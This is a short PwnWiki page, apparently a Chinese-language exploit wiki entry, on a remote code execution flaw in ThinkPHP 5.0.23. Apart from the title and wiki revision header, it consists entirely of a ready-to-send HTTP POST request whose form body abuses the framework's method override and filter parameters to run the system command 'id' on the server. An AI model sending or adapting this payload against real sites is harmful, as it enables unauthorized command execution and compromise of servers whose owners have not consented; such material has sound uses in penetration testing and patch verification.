ThinkPHP5 5.0.23遠程代碼執行漏洞

From PwnWiki
Revision as of 15:14, 26 February 2021 by Pwnwiki (talk | contribs) (建立內容為「==漏洞利用== 發送數據包: POST /index.php?s=captcha HTTP/1.1 <br> Host: localhost <br> Accept-Encoding: gzip, deflate <br> Accept: */* <br> Accept-Langu…」的新頁面)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

漏洞利用

發送數據包:


POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id